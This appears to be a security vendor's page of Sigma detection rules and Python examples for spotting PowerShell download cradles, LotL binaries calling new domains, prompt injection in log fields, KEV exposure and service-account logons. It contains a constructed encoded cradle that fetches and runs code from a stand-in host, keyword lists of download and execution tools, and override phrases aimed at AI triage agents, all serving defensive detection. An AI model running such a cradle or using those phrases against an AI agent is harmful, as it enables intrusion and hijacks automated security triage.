A small, opinionated set of detection rules we use ourselves. Baseline-aware where it matters, parent-process-conscious, and written for environments that already have too many rules. Copy what's useful. Skip what isn't.
Catches the classic powershell -enc <base64> download cradle, but suppresses common legitimate parents (your RMM, your patch management agent — edit the filter_known_parents block for your environment) instead of suppressing the cradle itself. In our benchmark across three environments, this cut the FP rate by roughly 80% versus the standard rule.
title: Suspicious PowerShell encoded download cradle (parent-aware)
id: 7c2a1d44-3e5b-4b29-9b88-2f1a0a4e9b41
status: experimental
description: |
  Detects PowerShell launches with -EncodedCommand that perform an outbound download.
  Suppresses known-legitimate parents to lower FP rate dramatically.
references:
  - https://syberops.com/signal/2026-04-24-living-off-the-land-revival.html
author: SyberOps
date: 2026/04/18
tags:
  - attack.execution
  - attack.t1059.001
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: windows
detection:
  selection_powershell:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
    CommandLine|contains: '-en'   # -en / -enc / -EncodedCommand
  selection_plain_url:
    # Cradle visible in clear text (e.g. only part of the command line is encoded).
    CommandLine|contains: 'http'
  selection_plain_keywords:
    CommandLine|contains:
      - 'IEX'
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'WebClient'
      - 'Invoke-WebRequest'
      - 'Net.WebRequest'
  selection_encoded_keywords:
    # -EncodedCommand carries UTF-16LE text in base64, so clear-text matching never sees
    # the cradle; base64offset tries all three base64 alignments of each keyword.
    CommandLine|utf16le|base64offset|contains:
      - 'http'
      - 'Invoke-Expression'
      - 'DownloadString'
      - 'WebClient'
      - 'Invoke-WebRequest'
      - 'Net.WebRequest'
  filter_known_parents:
    # EDIT FOR YOUR ENVIRONMENT — these are common false-positive parents.
    # Verify each is *actually* trusted in your shop before trusting them here.
    ParentImage|endswith:
      - '\ConfigurationManager\bin\x64\smsexec.exe'
      - '\WindowsAzure\GuestAgent\WaAppAgent.exe'
  condition: selection_powershell and ((selection_plain_url and selection_plain_keywords) or selection_encoded_keywords) and not filter_known_parents
falsepositives:
  - Legitimate scripted RMM workflows (add to filter_known_parents per environment)
  - Software installers that download payloads via PowerShell
level: high
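The rule's logic as plain Python, run over constructed process-creation events. This is an added example, not code from SyberOps or the rule itself; it reproduces the keyword bank and parent allow-list from the rule above and decodes -EncodedCommand (base64 of UTF-16LE) so the check sees the cradle that clear-text matching misses. Sample events and the example.invalid URL are constructed.

```python
import base64
import re

# Keyword bank and parent allow-list copied from the rule above (parents lower-cased for matching).
CRADLE_KEYWORDS = ("IEX", "Invoke-Expression", "DownloadString", "WebClient",
                   "Invoke-WebRequest", "Net.WebRequest")
KNOWN_PARENTS = ("\\configurationmanager\\bin\\x64\\smsexec.exe",
                 "\\windowsazure\\guestagent\\waappagent.exe")
# -en / -enc / -EncodedCommand followed by its base64 argument.
ENC_ARG = re.compile(r"(?:^|\s)[-/]en(?:c|codedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline: str) -> str:
    """Decoded -EncodedCommand payload (base64 of UTF-16LE text), or '' if absent or malformed."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""

def looks_like_cradle(text: str) -> bool:
    """The rule's clear-text test: an http URL plus at least one download/eval keyword."""
    low = text.lower()
    return "http" in low and any(k.lower() in low for k in CRADLE_KEYWORDS)

def evaluate(event: dict) -> str:
    """Classify one process_creation event as 'alert', 'suppressed' or 'no_match'."""
    if not event.get("Image", "").lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        return "no_match"
    cmd = event.get("CommandLine", "")
    if "-en" not in cmd.lower():
        return "no_match"
    # Test the command line as logged and, when it carries -EncodedCommand, its decoded payload.
    if not (looks_like_cradle(cmd) or looks_like_cradle(decode_encoded_command(cmd))):
        return "no_match"
    if event.get("ParentImage", "").lower().endswith(KNOWN_PARENTS):
        return "suppressed"
    return "alert"

# Constructed sample events (not real telemetry); the cradle text is the rule's own keyword pattern.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "CommandLine": f"powershell.exe -EncodedCommand {ENCODED}",
     "ParentImage": r"C:\Windows\explorer.exe"},                                   # alert
    {"Image": PS, "CommandLine": f"powershell.exe -enc {ENCODED}",
     "ParentImage": r"C:\Program Files\ConfigurationManager\bin\x64\smsexec.exe"},  # suppressed
]
```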
The "ship-this-today" rule referenced in our LotL Signal post. Joins a process-creation event with a network-connection event from the same PID, and filters on a domain-age enrichment field (most threat-intel feeds expose domain_age_days for free; the rule expects it enriched onto the event as dst_domain_age_days).
title: LotL binary outbound to recently-registered domain
id: 1f8b3c7e-4a92-4c18-bd1d-7e3a8f0c2d69
status: experimental
description: |
  Fires when a known LotL binary makes an outbound HTTPS connection to a domain
  whose age is 30 days or less. Pair with your DNS provider's domain-age enrichment.
references:
  - https://syberops.com/signal/2026-04-24-living-off-the-land-revival.html
author: SyberOps
date: 2026/04/19
tags:
  - attack.command_and_control
  - attack.t1105
  - attack.defense_evasion
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Image|endswith:
      - '\certutil.exe'
      - '\bitsadmin.exe'
      - '\mshta.exe'
      - '\regsvr32.exe'
    DestinationPort: 443
    Initiated: 'true'
  enrichment:
    # Requires DNS/TI enrichment of dst_domain_age_days at ingest time.
    dst_domain_age_days|lte: 30
  condition: selection and enrichment
falsepositives:
  - Newly-launched legitimate SaaS domains in the first 30 days post-registration
level: high
A first-pass detector for the prompt-injection-via-log pattern from Signal #001. This is not a substitute for structural isolation — it's a tripwire for cases where the structural defense gets misconfigured. Tune the keyword list against your real traffic; expect FPs on legitimate prompt-engineering content (developer logs, AI safety researcher traffic, etc.).
title: Possible prompt-injection content in log field
id: a3d0e6c1-58b4-4f7a-92c9-4b1d3e9c0a7f
status: experimental
description: |
  Heuristic match for prompt-injection-style content showing up in user-controllable
  log fields. Use as a tripwire, not as your primary defense — see the Research essay
  for why structural isolation is the real fix.
references:
  - https://syberops.com/research/prompt-injection-soc-agents.html
  - https://syberops.com/signal/2026-04-25-prompt-injection-soc-agents.html
author: SyberOps
date: 2026/04/22
tags:
  - attack.initial_access
  - attack.t1190
logsource:
  product: webserver
  category: webserver
detection:
  selection:
    # Sigma string matching is case-insensitive by default, so no case modifier is needed.
    cs_user_agent|contains|all:
      - 'ignore'
      - 'instruction'
  selection_phrases:
    # Pattern bank — tune to your traffic.
    cs_user_agent|contains:
      - 'auto-close'
      - 'severity LOW'
      - 'this event is benign'
      - 'you are now'
      - 'system prompt'
      - 'pretend you are'
  condition: selection or selection_phrases
falsepositives:
  - Developer or researcher traffic containing legitimate AI prompts
  - Internal red-team exercises
level: medium
Posture rule, not a behavior rule. Joins your CMDB / asset inventory against the live CISA KEV feed and fires when a
KEV-listed CVE is observed on a host marked internet_facing: true. Pair with the
re-prioritization triage agent to avoid drowning in low-priority KEVs.
title: CISA KEV CVE present on internet-facing asset
id: e5b1ac7c-92db-4bda-9c8e-2f0a3d70a4b1
status: experimental
description: |
  Correlates vulnerability scanner findings with CMDB exposure data and the live
  CISA KEV catalog. Fires only when (CVE in KEV) AND (asset.internet_facing == true).
references:
  - https://syberops.com/signal/2026-04-23-cisa-kev-batch-analysis.html
  - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
author: SyberOps
date: 2026/04/22
tags:
  - cve.kev
  - exposure
logsource:
  product: vuln_scanner
detection:
  selection:
    cve_id|exists: true
    asset.internet_facing: true
  enrichment:
    # in_list is not a standard Sigma modifier; map it to your SIEM's lookup/join.
    cve_id|in_list: 'cisa_kev_cve_ids'   # populate via daily KEV feed sync
  condition: selection and enrichment
falsepositives:
  - Compensating controls present (WAF, IPS sig) — exclude per asset
level: high
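The join the rule describes, as an added example that is not part of the page or the SyberOps tooling. It reads a KEV-shaped feed (the real feed's field names: cveID, dueDate, knownRansomwareCampaignUse), joins scanner findings against a CMDB exposure flag, applies per-asset exclusions for compensating controls, and orders the output the way a triage step would want it. The feed rows, hosts and CVE IDs are constructed placeholders.

```python
import json

# Constructed stand-in for the CISA KEV JSON feed: same field names as the real feed,
# but placeholder CVE IDs and dates, not real catalog rows.
KEV_FEED_JSON = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-0000-0001", "dueDate": "2026-06-01", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-0000-0002", "dueDate": "2026-05-15", "knownRansomwareCampaignUse": "Unknown"},
]})
# Constructed scanner findings and CMDB rows (hypothetical hosts).
FINDINGS = [
    {"host": "web01", "cve_id": "cve-0000-0001"},   # KEV, internet-facing -> fires
    {"host": "web01", "cve_id": "CVE-0000-0002"},   # KEV, internet-facing -> fires
    {"host": "web01", "cve_id": "CVE-0000-0003"},   # not in KEV -> silent
    {"host": "db01",  "cve_id": "CVE-0000-0001"},   # KEV, but internal -> silent
    {"host": "vpn01", "cve_id": "CVE-0000-0002"},   # KEV, internet-facing, excluded -> silent
]
CMDB = {"web01": {"internet_facing": True}, "db01": {"internet_facing": False},
        "vpn01": {"internet_facing": True}}
# Per-asset exclusions for compensating controls (WAF, IPS signature), per the rule's falsepositives note.
EXCLUDED = {("vpn01", "CVE-0000-0002")}

def load_kev(feed_json: str) -> dict:
    """Map cveID -> KEV entry, IDs upper-cased so scanner output in any case joins cleanly."""
    return {v["cveID"].upper(): v for v in json.loads(feed_json)["vulnerabilities"]}

def kev_exposure_alerts(findings, cmdb, kev, excluded=frozenset()):
    """Fire for (CVE in KEV) AND (asset.internet_facing == true), minus per-asset exclusions.
    Output is ordered most urgent first: CVEs with known ransomware use, then earliest KEV
    due date, so a triage step can consume it directly."""
    alerts = []
    for f in findings:
        cve = f["cve_id"].upper()
        host = f["host"]
        if cve not in kev or not cmdb.get(host, {}).get("internet_facing", False):
            continue  # either half of the AND failing keeps the rule silent
        if (host, cve) in excluded:
            continue
        entry = kev[cve]
        alerts.append({"host": host, "cve_id": cve,
                       "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
                       "due": entry.get("dueDate", "9999-12-31")})
    alerts.sort(key=lambda a: (not a["ransomware"], a["due"]))
    return alerts
```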
Service accounts (svc_*, $-suffixed, app-managed identities) should authenticate via Kerberos service tickets, not interactive logons. An interactive logon by a service account is almost always either misconfiguration or compromise. This is one of those rules with low alert volume and high precision — keep it on.
title: Interactive logon by service account
id: 0c8a6b22-5d31-4f88-aef2-9b1c2e8a14d7
status: stable
description: |
  Detects logon types 2, 7, 10, or 11 (interactive / unlock / RDP / cached interactive)
  by an account whose name matches the environment's service-account naming pattern.
author: SyberOps
date: 2026/04/15
tags:
  - attack.credential_access
  - attack.lateral_movement
  - attack.t1078
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4624
    LogonType:
      - 2
      - 7
      - 10
      - 11
  # Keys inside one Sigma map are ANDed, so a single map with both startswith and
  # endswith would only match names that carry the prefix AND the suffix. The two
  # patterns therefore live in separate selections that are ORed in the condition.
  selection_svc_prefix:
    # EDIT to match your environment's service account naming convention.
    TargetUserName|startswith:
      - 'svc_'
      - 'svc-'
  selection_svc_suffix:
    TargetUserName|endswith: '$'
  condition: selection and (selection_svc_prefix or selection_svc_suffix)
falsepositives:
  - Approved break-glass interactive use of a service account (should be rare and audited)
level: high
All rules on this page are MIT-licensed. Take them, modify them, ship them — no attribution required, though we'd love a pull request if you improve one. We're maintaining a small set we run ourselves rather than a huge unmaintained library. If a rule fires badly in your environment, that's a signal we want, not noise we want to ignore — drop us a line.
Want the agent to triage one of your alerts? Paste it into demo.syberops.com and watch the reasoning, severity call, and MITRE mapping stream live.